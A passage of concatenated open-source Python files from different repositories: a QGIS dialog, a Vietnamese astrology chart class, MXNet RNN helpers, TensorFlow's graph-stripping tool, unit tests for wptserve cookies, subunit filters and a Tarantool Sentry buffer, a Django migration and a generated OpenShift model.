os.path.dirname(__file__), 'tidy_city_dialog_base.ui'))
class TidyCityDialog(QDialog, FORM_CLASS):
def __init__(self, parent=None):
"""Constructor."""
super(TidyCityDialog, self).__init__(parent)
# Set up the user interface from Designer.
# After setupUI you can access any designer object by doing
# self.<objectname>, and you can use autoconnect slots - see
# http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html
# #widgets-and-dialogs-with-auto-connect
self.setupUi(self)
|
doanguyen/lasotuvi
|
refs/heads/master
|
lasotuvi/ThienBan.py
|
1
|
# -*- coding: utf-8 -*-
"""
(c) 2016 doanguyen <dungnv2410@gmail.com>.
"""
from lasotuvi.AmDuong import (canChiNgay, diaChi, ngayThangNam, ngayThangNamCanChi,
nguHanh, nguHanhNapAm, thienCan, timCuc, sinhKhac)
import time
from lasotuvi.Lich_HND import jdFromDate
class lapThienBan(object):
def __init__(self, nn, tt, nnnn, gioSinh, gioiTinh, ten, diaBan,
duongLich=True, timeZone=7):
super(lapThienBan, self).__init__()
self.gioiTinh = 1 if gioiTinh == 1 else -1
self.namNu = "Nam" if gioiTinh == 1 else "Nữ"
chiGioSinh = diaChi[gioSinh]
canGioSinh = ((jdFromDate(nn, tt, nnnn) - 1) * 2 % 10 + gioSinh) % 10
if canGioSinh == 0:
canGioSinh = 10
self.chiGioSinh = chiGioSinh
self.canGioSinh = canGioSinh
self.gioSinh = "{} {}".format(thienCan[canGioSinh]['tenCan'],
chiGioSinh['tenChi'])
self.timeZone = timeZone
self.today = time.strftime("%d/%m/%Y")
self.ngayDuong, self.thangDuong, self.namDuong, self.ten = \
nn, tt, nnnn, ten
if duongLich is True:
self.ngayAm, self.thangAm, self.namAm, self.thangNhuan = \
ngayThangNam(self.ngayDuong, self.thangDuong, self.namDuong,
True, self.timeZone)
else:
self.ngayAm, self.thangAm, self.namAm = self.ngayDuong,\
self.thangDuong, self.namDuong
self.canThang, self.canNam, self.chiNam = \
ngayThangNamCanChi(self.ngayAm, self.thangAm,
self.namAm, False, self.timeZone)
self.chiThang = self.thangAm
self.canThangTen = thienCan[self.canThang]['tenCan']
self.canNamTen = thienCan[self.canNam]['tenCan']
self.chiThangTen = diaChi[self.thangAm]['tenChi']
self.chiNamTen = diaChi[self.chiNam]['tenChi']
self.canNgay, self.chiNgay = canChiNgay(
self.ngayDuong, self.thangDuong, self.namDuong,
duongLich, timeZone)
self.canNgayTen = thienCan[self.canNgay]['tenCan']
self.chiNgayTen = diaChi[self.chiNgay]['tenChi']
cungAmDuong = 1 if (diaBan.cungMenh % 2 == 1) else -1
self.amDuongNamSinh = "Dương" if (self.chiNam % 2 == 1) else "Âm"
if (cungAmDuong * self.gioiTinh == 1):
self.amDuongMenh = "Âm dương thuận lý"
else:
self.amDuongMenh = "Âm dương nghịch lý"
cuc = timCuc(diaBan.cungMenh, self.canNam)
self.hanhCuc = nguHanh(cuc)['id']
self.tenCuc = nguHanh(cuc)['tenCuc']
self.menhChu = diaChi[self.canNam]['menhChu']
self.thanChu = diaChi[self.canNam]['thanChu']
self.menh = nguHanhNapAm(self.chiNam, self.canNam)
menhId = nguHanh(self.menh)['id']
menhCuc = sinhKhac(menhId, self.hanhCuc)
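        # sinhKhac() encodes the relation as 1 / -1 when Bản Mệnh generates /
        # overcomes Cục, and 1j / -1j when Cục generates / overcomes Bản Mệnh,
        # matching the branches below.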
if menhCuc == 1:
self.sinhKhac = "Bản Mệnh sinh Cục"
elif menhCuc == -1:
self.sinhKhac = "Bản Mệnh khắc Cục"
elif menhCuc == -1j:
self.sinhKhac = "Cục khắc Bản Mệnh"
elif menhCuc == 1j:
self.sinhKhac = "Cục sinh Bản mệnh"
else:
self.sinhKhac = "Cục hòa Bản Mệnh"
self.banMenh = nguHanhNapAm(self.chiNam, self.canNam, True)
|
antworteffekt/EDeN
|
refs/heads/master
|
eden/converter/molecule/__init__.py
|
12
|
__author__ = "Fabrizio Costa, Bjoern Gruening"
__copyright__ = "Copyright 2014, Fabrizio Costa"
__credits__ = ["Fabrizio Costa", "Bjoern Gruening"]
__license__ = "GPL"
__version__ = "0.1"
__maintainer__ = "Fabrizio Costa"
__email__ = "costa@informatik.uni-freiburg.de"
__status__ = "Production"
|
birryree/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/tools/wptserve/tests/functional/test_cookies.py
|
109
|
import unittest
import wptserve
from .base import TestUsingServer
class TestResponseSetCookie(TestUsingServer):
def test_name_value(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_cookie("name", "value")
return "Test"
route = ("GET", "/test/name_value", handler)
self.server.router.register(*route)
resp = self.request(route[1])
self.assertEqual(resp.info()["Set-Cookie"], "name=value; Path=/")
def test_unset(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_cookie("name", "value")
response.unset_cookie("name")
return "Test"
route = ("GET", "/test/unset", handler)
self.server.router.register(*route)
resp = self.request(route[1])
self.assertTrue("Set-Cookie" not in resp.info())
def test_delete(self):
@wptserve.handlers.handler
def handler(request, response):
response.delete_cookie("name")
return "Test"
route = ("GET", "/test/delete", handler)
self.server.router.register(*route)
resp = self.request(route[1])
parts = dict(item.split("=") for
item in resp.info()["Set-Cookie"].split("; ") if item)
self.assertEqual(parts["name"], "")
self.assertEqual(parts["Path"], "/")
#Should also check that expires is in the past
class TestRequestCookies(TestUsingServer):
def test_set_cookie(self):
@wptserve.handlers.handler
def handler(request, response):
return request.cookies["name"].value
route = ("GET", "/test/set_cookie", handler)
self.server.router.register(*route)
resp = self.request(route[1], headers={"Cookie": "name=value"})
self.assertEqual(resp.read(), b"value")
if __name__ == '__main__':
unittest.main()
|
jiajiechen/mxnet
|
refs/heads/master
|
python/mxnet/rnn/rnn.py
|
44
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=too-many-arguments, no-member
"""Functions for constructing recurrent neural networks."""
import warnings
from ..model import save_checkpoint, load_checkpoint
from .rnn_cell import BaseRNNCell
def rnn_unroll(cell, length, inputs=None, begin_state=None, input_prefix='', layout='NTC'):
"""Deprecated. Please use cell.unroll instead"""
warnings.warn('rnn_unroll is deprecated. Please call cell.unroll directly.')
return cell.unroll(length=length, inputs=inputs, begin_state=begin_state,
input_prefix=input_prefix, layout=layout)
def save_rnn_checkpoint(cells, prefix, epoch, symbol, arg_params, aux_params):
"""Save checkpoint for model using RNN cells.
Unpacks weight before saving.
Parameters
----------
cells : RNNCell or list of RNNCells
The RNN cells used by this symbol.
prefix : str
Prefix of model name.
epoch : int
The epoch number of the model.
symbol : Symbol
The input symbol
arg_params : dict of str to NDArray
Model parameter, dict of name to NDArray of net's weights.
aux_params : dict of str to NDArray
Model parameter, dict of name to NDArray of net's auxiliary states.
Notes
-----
- ``prefix-symbol.json`` will be saved for symbol.
- ``prefix-epoch.params`` will be saved for parameters.
"""
if isinstance(cells, BaseRNNCell):
cells = [cells]
for cell in cells:
arg_params = cell.unpack_weights(arg_params)
save_checkpoint(prefix, epoch, symbol, arg_params, aux_params)
def load_rnn_checkpoint(cells, prefix, epoch):
"""Load model checkpoint from file.
Pack weights after loading.
Parameters
----------
cells : RNNCell or list of RNNCells
The RNN cells used by this symbol.
prefix : str
Prefix of model name.
epoch : int
Epoch number of model we would like to load.
Returns
-------
symbol : Symbol
The symbol configuration of computation network.
arg_params : dict of str to NDArray
Model parameter, dict of name to NDArray of net's weights.
aux_params : dict of str to NDArray
Model parameter, dict of name to NDArray of net's auxiliary states.
Notes
-----
- symbol will be loaded from ``prefix-symbol.json``.
- parameters will be loaded from ``prefix-epoch.params``.
"""
sym, arg, aux = load_checkpoint(prefix, epoch)
if isinstance(cells, BaseRNNCell):
cells = [cells]
for cell in cells:
arg = cell.pack_weights(arg)
return sym, arg, aux
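# A hedged usage sketch (not part of this module); the LSTM cell and the
# 'mymodel' prefix are placeholder names:
#   cell = mx.rnn.LSTMCell(num_hidden=100, prefix='lstm_')
#   save_rnn_checkpoint(cell, 'mymodel', 1, sym, arg_params, aux_params)
#   sym, arg_params, aux_params = load_rnn_checkpoint(cell, 'mymodel', 1)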
def do_rnn_checkpoint(cells, prefix, period=1):
"""Make a callback to checkpoint Module to prefix every epoch.
unpacks weights used by cells before saving.
Parameters
----------
cells : RNNCell or list of RNNCells
The RNN cells used by this symbol.
prefix : str
The file prefix to checkpoint to
period : int
How many epochs to wait before checkpointing. Default is 1.
Returns
-------
callback : function
The callback function that can be passed as iter_end_callback to fit.
"""
period = int(max(1, period))
# pylint: disable=unused-argument
def _callback(iter_no, sym=None, arg=None, aux=None):
"""The checkpoint function."""
if (iter_no + 1) % period == 0:
save_rnn_checkpoint(cells, prefix, iter_no+1, sym, arg, aux)
return _callback
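# A minimal sketch of wiring the callback into training; the Module instance
# and data iterator names are placeholders, not part of this file:
#   checkpoint_cb = do_rnn_checkpoint(cell, 'mymodel', period=1)
#   mod.fit(train_iter, num_epoch=10, epoch_end_callback=checkpoint_cb)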
|
wimberosa/samba
|
refs/heads/master
|
lib/subunit/python/subunit/tests/test_subunit_filter.py
|
50
|
#
# subunit: extensions to python unittest to get test results from subprocesses.
# Copyright (C) 2005 Robert Collins <robertc@robertcollins.net>
#
# Licensed under either the Apache License, Version 2.0 or the BSD 3-clause
# license at the users choice. A copy of both licenses are available in the
# project source as Apache-2.0 and BSD. You may not use this file except in
# compliance with one of these two licences.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under these licenses is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# license you chose for the specific language governing permissions and
# limitations under that license.
#
"""Tests for subunit.TestResultFilter."""
from datetime import datetime
from subunit import iso8601
import unittest
from testtools import TestCase
from testtools.compat import _b, BytesIO, StringIO
from testtools.testresult.doubles import ExtendedTestResult
import subunit
from subunit.test_results import TestResultFilter
class TestTestResultFilter(TestCase):
"""Test for TestResultFilter, a TestResult object which filters tests."""
# While TestResultFilter works on python objects, using a subunit stream
# is an easy pithy way of getting a series of test objects to call into
# the TestResult, and as TestResultFilter is intended for use with subunit
# also has the benefit of detecting any interface skew issues.
example_subunit_stream = _b("""\
tags: global
test passed
success passed
test failed
tags: local
failure failed
test error
error error [
error details
]
test skipped
skip skipped
test todo
xfail todo
""")
def run_tests(self, result_filter, input_stream=None):
"""Run tests through the given filter.
:param result_filter: A filtering TestResult object.
:param input_stream: Bytes of subunit stream data. If not provided,
uses TestTestResultFilter.example_subunit_stream.
"""
if input_stream is None:
input_stream = self.example_subunit_stream
test = subunit.ProtocolTestCase(BytesIO(input_stream))
test.run(result_filter)
def test_default(self):
"""The default is to exclude success and include everything else."""
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result)
self.run_tests(result_filter)
# skips are seen as success by default python TestResult.
self.assertEqual(['error'],
[error[0].id() for error in filtered_result.errors])
self.assertEqual(['failed'],
[failure[0].id() for failure in
filtered_result.failures])
self.assertEqual(4, filtered_result.testsRun)
def test_exclude_errors(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result, filter_error=True)
self.run_tests(result_filter)
# skips are seen as errors by default python TestResult.
self.assertEqual([], filtered_result.errors)
self.assertEqual(['failed'],
[failure[0].id() for failure in
filtered_result.failures])
self.assertEqual(3, filtered_result.testsRun)
def test_fixup_expected_failures(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result,
fixup_expected_failures=set(["failed"]))
self.run_tests(result_filter)
self.assertEqual(['failed', 'todo'],
[failure[0].id() for failure in filtered_result.expectedFailures])
self.assertEqual([], filtered_result.failures)
self.assertEqual(4, filtered_result.testsRun)
def test_fixup_expected_errors(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result,
fixup_expected_failures=set(["error"]))
self.run_tests(result_filter)
self.assertEqual(['error', 'todo'],
[failure[0].id() for failure in filtered_result.expectedFailures])
self.assertEqual([], filtered_result.errors)
self.assertEqual(4, filtered_result.testsRun)
def test_fixup_unexpected_success(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result, filter_success=False,
fixup_expected_failures=set(["passed"]))
self.run_tests(result_filter)
self.assertEqual(['passed'],
[passed.id() for passed in filtered_result.unexpectedSuccesses])
self.assertEqual(5, filtered_result.testsRun)
def test_exclude_failure(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result, filter_failure=True)
self.run_tests(result_filter)
self.assertEqual(['error'],
[error[0].id() for error in filtered_result.errors])
self.assertEqual([],
[failure[0].id() for failure in
filtered_result.failures])
self.assertEqual(3, filtered_result.testsRun)
def test_exclude_skips(self):
filtered_result = subunit.TestResultStats(None)
result_filter = TestResultFilter(filtered_result, filter_skip=True)
self.run_tests(result_filter)
self.assertEqual(0, filtered_result.skipped_tests)
self.assertEqual(2, filtered_result.failed_tests)
self.assertEqual(3, filtered_result.testsRun)
def test_include_success(self):
"""Successes can be included if requested."""
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result,
filter_success=False)
self.run_tests(result_filter)
self.assertEqual(['error'],
[error[0].id() for error in filtered_result.errors])
self.assertEqual(['failed'],
[failure[0].id() for failure in
filtered_result.failures])
self.assertEqual(5, filtered_result.testsRun)
def test_filter_predicate(self):
"""You can filter by predicate callbacks"""
filtered_result = unittest.TestResult()
def filter_cb(test, outcome, err, details):
return outcome == 'success'
result_filter = TestResultFilter(filtered_result,
filter_predicate=filter_cb,
filter_success=False)
self.run_tests(result_filter)
# Only success should pass
self.assertEqual(1, filtered_result.testsRun)
def test_time_ordering_preserved(self):
# Passing a subunit stream through TestResultFilter preserves the
# relative ordering of 'time' directives and any other subunit
# directives that are still included.
date_a = datetime(year=2000, month=1, day=1, tzinfo=iso8601.UTC)
date_b = datetime(year=2000, month=1, day=2, tzinfo=iso8601.UTC)
date_c = datetime(year=2000, month=1, day=3, tzinfo=iso8601.UTC)
subunit_stream = _b('\n'.join([
"time: %s",
"test: foo",
"time: %s",
"error: foo",
"time: %s",
""]) % (date_a, date_b, date_c))
result = ExtendedTestResult()
result_filter = TestResultFilter(result)
self.run_tests(result_filter, subunit_stream)
foo = subunit.RemotedTestCase('foo')
self.assertEquals(
[('time', date_a),
('startTest', foo),
('time', date_b),
('addError', foo, {}),
('stopTest', foo),
('time', date_c)], result._events)
def test_skip_preserved(self):
subunit_stream = _b('\n'.join([
"test: foo",
"skip: foo",
""]))
result = ExtendedTestResult()
result_filter = TestResultFilter(result)
self.run_tests(result_filter, subunit_stream)
foo = subunit.RemotedTestCase('foo')
self.assertEquals(
[('startTest', foo),
('addSkip', foo, {}),
('stopTest', foo), ], result._events)
def test_suite():
loader = subunit.tests.TestUtil.TestLoader()
result = loader.loadTestsFromName(__name__)
return result
|
tornadozou/tensorflow
|
refs/heads/master
|
tensorflow/python/tools/strip_unused.py
|
180
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Removes unneeded nodes from a GraphDef file.
This script is designed to help streamline models, by taking the input and
output nodes that will be used by an application and figuring out the smallest
set of operations that are required to run for those arguments. The resulting
minimal graph is then saved out.
The advantages of running this script are:
- You may be able to shrink the file size.
- Operations that are unsupported on your platform but still present can be
safely removed.
The resulting graph may not be as flexible as the original though, since any
input nodes that weren't explicitly mentioned may not be accessible any more.
An example of command-line usage is:
bazel build tensorflow/python/tools:strip_unused && \
bazel-bin/tensorflow/python/tools/strip_unused \
--input_graph=some_graph_def.pb \
--output_graph=/tmp/stripped_graph.pb \
--input_node_names=input0
--output_node_names=softmax
You can also look at strip_unused_test.py for an example of how to use it.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import app
from tensorflow.python.tools import strip_unused_lib
FLAGS = None
def main(unused_args):
strip_unused_lib.strip_unused_from_files(FLAGS.input_graph,
FLAGS.input_binary,
FLAGS.output_graph,
FLAGS.output_binary,
FLAGS.input_node_names,
FLAGS.output_node_names,
FLAGS.placeholder_type_enum)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.register('type', 'bool', lambda v: v.lower() == 'true')
parser.add_argument(
'--input_graph',
type=str,
default='',
help='TensorFlow \'GraphDef\' file to load.')
parser.add_argument(
'--input_binary',
nargs='?',
const=True,
type='bool',
default=False,
help='Whether the input files are in binary format.')
parser.add_argument(
'--output_graph',
type=str,
default='',
help='Output \'GraphDef\' file name.')
parser.add_argument(
'--output_binary',
nargs='?',
const=True,
type='bool',
default=True,
help='Whether to write a binary format graph.')
parser.add_argument(
'--input_node_names',
type=str,
default='',
help='The name of the input nodes, comma separated.')
parser.add_argument(
'--output_node_names',
type=str,
default='',
help='The name of the output nodes, comma separated.')
parser.add_argument(
'--placeholder_type_enum',
type=int,
default=dtypes.float32.as_datatype_enum,
help='The AttrValue enum to use for placeholders.')
FLAGS, unparsed = parser.parse_known_args()
app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
Milstein/crowdsource-platform
|
refs/heads/develop2
|
crowdsourcing/migrations/0017_auto_20150709_0204.py
|
16
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('crowdsourcing', '0016_auto_20150709_0201'),
]
operations = [
migrations.AddField(
model_name='conversation',
name='recipients',
field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='crowdsourcing.ConversationRecipient'),
),
migrations.AlterField(
model_name='conversation',
name='sender',
field=models.ForeignKey(related_name='sender', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='conversationrecipient',
name='message',
field=models.ForeignKey(related_name='conversation_message', to='crowdsourcing.Conversation'),
),
migrations.AlterField(
model_name='conversationrecipient',
name='recipient',
field=models.ForeignKey(related_name='recipients', to=settings.AUTH_USER_MODEL),
),
]
|
toidi/tarantool-python-utils
|
refs/heads/master
|
tests/test_sentry_buffer.py
|
1
|
# -*- coding: utf-8 -*-
from datetime import timedelta
import os
import mock
from unittest import TestCase
from django.conf import settings
from django.utils import timezone
from sentry.models import Project, Group
from sentry.utils.imports import import_string
from sentry.utils.compat import pickle
import tarantool
class TarantoolSentryBuffetTestCase(TestCase):
def __init__(self, *args, **kwargs):
super(TarantoolSentryBuffetTestCase, self).__init__(*args, **kwargs)
sentry_space = int(os.environ.get('SENTRY_BUFFER_SPACE', '2'))
sentry_extra_space = int(os.environ.get('SENTRY_BUFFER_EXTRA_SPACE',
'3'))
self.sentry_space = sentry_space
self.sentry_extra_space = sentry_extra_space
def setUp(self):
host_cfg = settings.SENTRY_BUFFER_OPTIONS['hosts'][0]['host']
host, _, port = host_cfg.rpartition(':')
self.client = tarantool.connect(host, int(port))
self.buffer = self.get_instance(
'tarantool_utils.sentry.Tarantool15Buffer',
settings.SENTRY_BUFFER_OPTIONS)
self.clean_tnt()
def clean_tnt(self):
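        # Truncate both Tarantool spaces (the counter space and the pickled
        # "extra" space) via box.dostring so every test starts from an empty buffer.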
lua_code = 'box.space[%s]:truncate()'
self.buffer._tnt.call('box.dostring', lua_code % self.sentry_space)
self.buffer._tnt.call('box.dostring', lua_code % self.sentry_extra_space)
def tearDown(self):
self.client.close()
def test_coerce_val_handles_foreignkeys(self):
assert self.buffer._coerce_val(Project(id=1)) == '1'
def test_coerce_val_handles_unicode(self):
assert self.buffer._coerce_val(u'\u201d') == '”'
def test_make_key_response(self):
column = 'times_seen'
filters = {'pk': 1}
self.assertEquals(self.buffer._make_key(Group, filters, column), 'sentry.group:88b48b31b5f100719c64316596b10b0f:times_seen')
def test_make_extra_key_response(self):
filters = {'pk': 1}
self.assertEquals(self.buffer._make_extra_key(Group, filters), 'sentry.group:extra:88b48b31b5f100719c64316596b10b0f')
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.process_incr')
def test_incr_delays_task(self, process_incr):
model = mock.Mock()
columns = {'times_seen': 1}
filters = {'pk': 1}
self.buffer.incr(model, columns, filters)
kwargs = dict(model=model, columns=columns, filters=filters, extra=None)
process_incr.apply_async.assert_called_once_with(
kwargs=kwargs, countdown=5)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.process_incr', mock.Mock())
def test_incr_does_buffer_to_conn(self):
model = mock.Mock()
columns = {'times_seen': 1}
filters = {'pk': 1}
self.buffer.incr(model, columns, filters)
response = self.buffer._tnt.select(self.sentry_space, 'foo')
self.assertEquals(int(response[0][1]), 1)
self.buffer.incr(model, columns, filters)
response = self.buffer._tnt.select(self.sentry_space, 'foo')
self.assertEquals(int(response[0][1]), 2)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_does_not_save_empty_results(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
self.buffer.process(Group, columns, filters)
self.assertFalse(process.called)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_does_save_call_with_results(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
self.buffer._tnt.insert(self.sentry_space, ('foo', 2, 0L))
self.buffer.process(Group, columns, filters)
process.assert_called_once_with(Group, {'times_seen': 2}, filters, None)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_does_clear_buffer(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
self.buffer._tnt.insert(self.sentry_space, ('foo', 2, 0L))
self.buffer.process(Group, columns, filters)
response = self.buffer._tnt.select(self.sentry_space, ['foo'])
self.assertEquals(int(response[0][1]), 0)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.process_incr', mock.Mock())
def test_incr_does_buffer_extra_to_conn(self):
model = mock.Mock()
columns = {'times_seen': 1}
filters = {'pk': 1}
self.buffer.incr(model, columns, filters, extra={'foo': 'bar'})
response = self.buffer._tnt.select(self.sentry_extra_space, [('extra', 'foo')])
self.assertEquals(response[0][2], pickle.dumps('bar'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_saves_extra(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
the_date = (timezone.now() + timedelta(days=5)).replace(microsecond=0)
self.buffer._tnt.insert(self.sentry_space, ('foo', 1, 0L))
self.buffer._tnt.insert(self.sentry_extra_space, ('extra', 'last_seen', pickle.dumps(the_date), 0L))
self.buffer.process(Group, columns, filters)
process.assert_called_once_with(Group, columns, filters, {'last_seen': the_date})
lua_code = 'return box.space[%s]:len()' % (self.sentry_extra_space,)
response = self.buffer._tnt.call('box.dostring', lua_code)
self.assertEqual(0, int(response[0][0]))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_lock_key(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
self.buffer._tnt.insert(self.sentry_space, ('foo', 2, 0L))
self.buffer.process(Group, columns, filters)
self.buffer.process(Group, columns, filters)
self.buffer.process(Group, columns, filters)
process.assert_called_once_with(Group, {'times_seen': 2}, filters, None)
@staticmethod
def get_instance(path, options):
cls = import_string(path)
return cls(**options)
|
ftl-toolbox/lib_openshift
|
refs/heads/master
|
lib_openshift/models/v1_deployment_config_rollback_spec.py
|
2
|
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1DeploymentConfigRollbackSpec(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'_from': 'V1ObjectReference',
'include_triggers': 'bool',
'include_template': 'bool',
'include_replication_meta': 'bool',
'include_strategy': 'bool'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'_from': 'from',
'include_triggers': 'includeTriggers',
'include_template': 'includeTemplate',
'include_replication_meta': 'includeReplicationMeta',
'include_strategy': 'includeStrategy'
}
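    # Illustrative note (not in the generated source): per attribute_map above,
    # the Python attribute _from (a V1ObjectReference) serializes under the
    # JSON key "from", which cannot be used directly as an attribute name.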
def __init__(self, _from=None, include_triggers=None, include_template=None, include_replication_meta=None, include_strategy=None):
"""
V1DeploymentConfigRollbackSpec - a model defined in Swagger
"""
self.__from = _from
self._include_triggers = include_triggers
self._include_template = include_template
self._include_replication_meta = include_replication_meta
self._include_strategy = include_strategy
@property
def _from(self):
"""
Gets the _from of this V1DeploymentConfigRollbackSpec.
From points to a ReplicationController which is a deployment.
:return: The _from of this V1DeploymentConfigRollbackSpec.
:rtype: V1ObjectReference
"""
return self.__from
@_from.setter
def _from(self, _from):
"""
Sets the _from of this V1DeploymentConfigRollbackSpec.
From points to a ReplicationController which is a deployment.
:param _from: The _from of this V1DeploymentConfigRollbackSpec.
:type: V1ObjectReference
"""
self.__from = _from
@property
def include_triggers(self):
"""
Gets the include_triggers of this V1DeploymentConfigRollbackSpec.
IncludeTriggers specifies whether to include config Triggers.
:return: The include_triggers of this V1DeploymentConfigRollbackSpec.
:rtype: bool
"""
return self._include_triggers
@include_triggers.setter
def include_triggers(self, include_triggers):
"""
Sets the include_triggers of this V1DeploymentConfigRollbackSpec.
IncludeTriggers specifies whether to include config Triggers.
:param include_triggers: The include_triggers of this V1DeploymentConfigRollbackSpec.
:type: bool
"""
self._include_triggers = include_triggers
@property
def include_template(self):
"""
Gets the include_template of this V1DeploymentConfigRollbackSpec.
IncludeTemplate specifies whether to include the PodTemplateSpec.
:return: The include_template of this V1DeploymentConfigRollbackSpec.
:rtype: bool
"""
return self._include_template
@include_template.setter
def include_template(self, include_template):
"""
Sets the include_template of this V1DeploymentConfigRollbackSpec.
IncludeTemplate specifies whether to include the PodTemplateSpec.
:param include_template: The include_template of this V1DeploymentConfigRollbackSpec.
:type: bool
"""
self._include_template = include_template
@property
def include_replication_meta(self):
"""
Gets the include_replication_meta of this V1DeploymentConfigRollbackSpec.
IncludeReplicationMeta specifies whether to include the replica count and selector.
:return: The include_replication_meta of this V1DeploymentConfigRollbackSpec.
:rtype: bool
"""
return self._include_replication_meta
@include_replication_meta.setter
def include_replication_meta(self, include_replication_meta):
"""
Sets the include_replication_meta of this V1DeploymentConfigRollbackSpec.
IncludeReplicationMeta specifies whether to include the replica count and selector.
:param include_replication_meta: The include_replication_meta of this V1DeploymentConfigRollbackSpec.
:type: bool
"""
self._include_replication_meta = include_replication_meta
@property
def include_strategy(self):
"""
Gets the include_strategy of this V1DeploymentConfigRollbackSpec.
IncludeStrategy specifies whether to include the deployment Strategy.
:return: The include_strategy of this V1DeploymentConfigRollbackSpec.
:rtype: bool
"""
return self._include_strategy
@include_strategy.setter
def include_strategy(self, include_strategy):
"""
Sets the include_strategy of this V1DeploymentConfigRollbackSpec.
IncludeStrategy specifies whether to include the deployment Strategy.
:param include_strategy: The include_strategy of this V1DeploymentConfigRollbackSpec.
:type: bool
"""
self._include_strategy = include_strategy
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1DeploymentConfigRollbackSpec.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
